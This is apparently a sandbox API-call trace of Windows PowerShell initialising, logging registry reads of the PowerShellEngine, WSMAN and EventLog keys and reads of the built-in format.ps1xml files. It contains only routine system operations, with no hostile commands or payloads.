Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096	17	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096	62	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096	21	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
